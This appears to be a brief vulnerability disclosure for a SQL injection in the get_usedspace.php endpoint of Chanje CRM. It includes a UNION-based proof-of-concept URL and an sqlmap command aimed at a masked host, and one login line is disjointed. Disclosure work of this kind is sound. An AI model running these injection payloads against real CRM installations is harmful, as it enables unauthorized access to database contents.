Chanje CRM get_usedspace.php SQL injection vulnerability
Vulnerability description
Chanje CRM get_usedspace.php has a SQL vulnerability, through which sensitive database information can be obtained
Vulnerability impact
畅捷CRM
Vulnerability recurrence
log in page
It is found that using admin/empty password cannot log in successfully
Verify POC
/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--
Use Sqlmap to verify vulnerabilities
sqlmap -u "http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id